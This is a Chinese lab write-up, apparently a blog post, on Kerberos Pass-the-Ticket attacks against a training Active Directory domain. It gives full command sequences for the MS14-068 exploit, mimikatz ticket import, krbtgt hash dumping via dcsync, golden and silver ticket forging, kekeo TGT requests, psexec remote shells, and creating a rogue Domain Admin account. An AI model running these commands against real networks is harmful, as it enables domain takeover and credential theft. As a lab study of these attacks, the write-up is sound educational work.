域渗透PTT票据传递攻击(Pass the Ticket)

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

PTT 票据传递攻击(Pass the Ticket)

描述:

PTT票据传递主要根据kerberos协议&kerberos认证原理来进行攻击:
kerberos原理:打个比方:就好比A需要进入公司办公处,首先需要去门卫处验证是否是这个公司的人(也就是通过AS的认证);然后通过门卫确认后,拿着门卫的凭证(也就是我们所需要TGT)去办公处里面,这时候我们如果需要去领导办公室查询资料(就是访问Sever),那么就需要通过办公处的前台去登记,让前台确认我们是否有去查询的资格,当确认我们有资格后会给予凭证(就是ST),我们就可以拿着这个凭证去领导办公室查询资料了。
借用我们上面的比方:来带入我们kerberos中:

  • 首先 Client 向域控制器 DC 请求访问 Server,DC 通过去 AD 活动目录中查找依次区分 Client 来判断 Client 是否可信;
  • 认证通过后返回 TGT 给 Client,Client 得到 TGT(Ticket GrantingTicket);
  • Client 继续拿着 TGT 请求 DC 访问 Server,TGS 通过 Client 消息中的 TGT,判断 Client 是否有访问权限;
  • 如果有,则给 Client 有访问 Server 的权限 Ticket,也叫 ST(ServiceTicket);
  • Client 得到 Ticket 后,再去访问 Server,且该 Ticket 只针对这一个 Server有效;
  • 最终 Server 和 Client 建立通信。
    如图就是这样的六步:
    在这里插入图片描述
    而我们下面要说的所谓的黄金票据和白银票据,借用我们上面的比方来进行讲解,让人更容易去理解:
    黄金票据:就是我们攻击者伪装成这个公司的员工,自己伪造了一个门卫的凭证(TGT),因此就不需要和门卫(AS)去登记,进入办公区(KDC)后,窃取了一个万能凭证(就是krbtgt账号),拥有这个凭证就可以自有出入领导办公室查询资料。
    白银票据:就是我们的攻击者拿到了这个公司领导办公室侧门的钥匙(也就是可以利用部分的服务,比如cifs),他都不需要进入办公区(KDC)去找前台登记给予凭证(ST),拥有了钥匙直接去打开领导办公室的侧门进入查询资料。

票据传递攻击:

域内常用的两种攻击方式,分别为黄金票据和白银票据:

黄金票据原理:

在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给 Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在 KDC 中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造 TGT 和Logon Session Key 来进入下一步 Client 与 TGS 的交互。而已有了金票后,就跳过AS 验证,不用验证账户和密码,所以也不担心域管密码修改。

特点:

不需要与 AS 进行交互,需要用户 krbtgt 的 Hash。

MS14-068

这个漏洞的原理就和黄金票据相似,所以我们先来复现这个漏洞:

原理:

通过生成黄金票据,导入工具中,将一个普通权限的域用户获取域管的使用权限,从而达到控制整个域。
当获取域用户时,对这个域进行信息收集:
获取是否MS14-068相应补丁情况:

systeminfo | findstr "3011780"

返回为空则没有相应的补丁
在这里插入图片描述
ms14-068exp使用方法:

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址

收集域成员的SID:

whoami /all 
whoami /user #只单独查询SID

在这里插入图片描述
收集域管账号及域名称:

net time #获取域管账号
net config workstation #获取域信息
nltest /dsgetdc:moonsec #获取域管信息

在这里插入图片描述
在这里插入图片描述
构造成08server-dc.moonsec.fbi,在制作黄金票据中使用:
利用ms14-068的exp来生成一个黄金票据:

ms14-068.exe -u test@moonsec.fbi -p 123456 -s S-1-5-21-2801122135-3886333168-273474972-1103 -d 08server-dc.moonsec.fbi

在这里插入图片描述
这里我们可以先看下票据未导入前,是无法查看域控的C盘:

dir \\08server-dc.moonsec.fbi\C$  #这里必须使用计算机全名去查看,IP地址是不行的。

在这里插入图片描述
使用mimitakz导入票据:

kerberos::purge  #清空票据
kerberos::ptc 票据 #导入票据
kerberos::list #查看票据

在这里插入图片描述
再次查看域控的C盘,现在是可以访问的:

dir \\08server-dc.moonsec.fbi\C$

在这里插入图片描述
使用psexec反弹cmd:

Psexec64.exe /accepteula /s \\08server-dc.moonsec.fbi cmd.exe

在这里插入图片描述
将cmd反弹出来,即可创建域管账号:

net user Longwaer QWEasd123 /add /domain
net group "Domain Admins" Longwaer /add /domain

在这里插入图片描述

金票制作:

这里我们已经假设获得了域管权限,然后我们利用mimikatz导出krbtgt账号信息:

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:moonsec.fbi /user:krbtgt" "exit">loghash.txt

在这里插入图片描述
利用mimikatz生成黄金票据:

mimikatz.exe "kerberos::golden /admin:system /domain:moonsec.fbi /sid:S-1-5-21-2801122135-3886333168-273474972 /krbtgt:811a536cf58aa23ceb8d439ffb386e6f /ticket:ticket.kirbi" exit

在这里插入图片描述
将票据注入内存:

kerberos::purge #清除票据
kerberos:: ptt 票据 #将票据注入内存

成功访问:
在这里插入图片描述

白银票据原理:

如果说黄金票据是伪造的 TGT,那么白银票据就是伪造的 ST。在 Kerberos 认证的第三部,Client 带着 ST 和 Authenticator3 向 Server 上的某个服务进行请求,Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问 server 上的指定服务了。所以我们只需要知道 Server 用户的 Hash 就可以伪造出一个 ST,且不会经过 KDC,但是伪造的门票只对部分服务起作用。

特点:

不需要与KDC进行交互;需要server的NTLM hash。

银票制作:

假设我们已经获得域管权限,使用mimikatz导出信息:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

在这里插入图片描述
然后利用server的NTLM hash制作银票:
使用方法:

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt
kerberos::purge
kerberos::golden /domain:moonsec.fbi /sid:S-1-5-21-2801122135-3886333168-273474972 /target:08server-dc.moonsec.fbi /service:cifs /rc4:d0584c0b6d8ef7693ecaca2469348555 /user:administrator /ptt

这里rc4:使用的是08server-dc的ntlm hash
在这里插入图片描述
在这里插入图片描述

使用kekeo,制作银票:

tgt::ask /user:administrator /domain:moonsec.fbi /ntlm:42e2656ec24331269f82160ff5962387
kerberos::ptt 票据 

在这里插入图片描述

金票和银票之前的区别:

获取的权限不同
金票:伪造的 TGT,可以获取任意 Kerberos 的访问权限
银票:伪造的 ST,只能访问指定的服务,如 CIFS
认证流程不同
金票:同 KDC 交互,但不同 AS 交互
银票:不同 KDC 交互,直接访问 Server
加密方式不同
金票:由 krbtgt NTLM Hash 加密
银票:由服务账号 NTLM Hash 加密

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值